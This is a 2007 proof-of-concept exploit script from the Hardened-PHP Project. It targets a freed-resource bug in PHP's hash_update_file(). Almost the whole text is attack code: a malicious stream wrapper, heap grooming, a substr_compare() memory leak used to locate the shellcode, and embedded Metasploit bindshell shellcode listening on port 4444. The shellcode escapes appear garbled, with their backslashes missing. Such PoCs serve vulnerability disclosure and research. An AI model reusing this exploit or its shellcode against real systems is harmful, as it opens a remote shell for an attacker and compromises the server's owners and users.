MOPB-hash.txt
Posted on 21 March 2007
<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ // // | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP hash_update_file() freed resource usage exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // linux x86 bindshell on port 4444 from Metasploit $shellcode = "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46". "x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f". "x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6". "xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06". "x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc". "xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d". "x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65"; define("OFFSET", pack("L",findOffset())); class AttackStream { function stream_open($path, $mode, $options, &$opened_path) { return true; } function stream_read($count) { hash_final($GLOBALS['hid'], true); $GLOBALS['aaaaaaaaaaaaaaaaaaaaaa'] = str_repeat(OFFSET, 3); return "A"; } function stream_eof() { return true; } function stream_seek($offset, $whence) { return false; } } stream_wrapper_register("attack", "AttackStream") or die("Failed to register protocol"); $hid = hash_init('md5'); hash_update_file($hid, "attack://nothing"); // This function uses the substr_compare() vulnerability // to get the offset. function findOffset() { global $offset_1, $offset_2, $shellcode; // We need to NOT clear these variables, // otherwise the heap is too segmented global $memdump, $d, $arr; $sizeofHashtable = 39; $maxlong = 0x7fffffff; // Signature of a big endian Hashtable of size 256 with 1 element $search = "x00x01x00x00xffx00x00x00x01x00x00x00"; $memdump = str_repeat("A", 8192); for ($i=0; $i<400; $i++) { $d[$i]=array(); } unset($d[350]); $x = str_repeat("x01", $sizeofHashtable); unset($d[351]); unset($d[352]); $arr = array(); for ($i=0; $i<129; $i++) { $arr[$i] = 1; } $arr[$shellcode] = 1; for ($i=0; $i<129; $i++) { unset($arr[$i]); } // If the libc memcmp leaks the information use it // otherwise we only get a case insensitive memdump $b = substr_compare(chr(65),chr(0),0,1,false) != 65; for ($i=0; $i<8192; $i++) { $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); if ($y-$Y == 1 || $Y-$y==1){ $y = chr($y); if ($b && strtoupper($y)!=$y) { if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { $y = strtoupper($y); } } $memdump[$i] = $y; } else { $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); if ($y-$Y != 1 && $Y-$y!=1){ $memdump[$i] = chr(1); } else { $memdump[$i] = chr(0); } } } // Search hashtable to get the shellcode offset $pos_hashtable = strpos($memdump, $search); if ($pos_hashtable == 0) { die ("Unable to find the offset"); } $addr = substr($memdump, $pos_hashtable+6*4, 4); $addr = unpack("L", $addr); return ($addr[1] + 32); } ?>
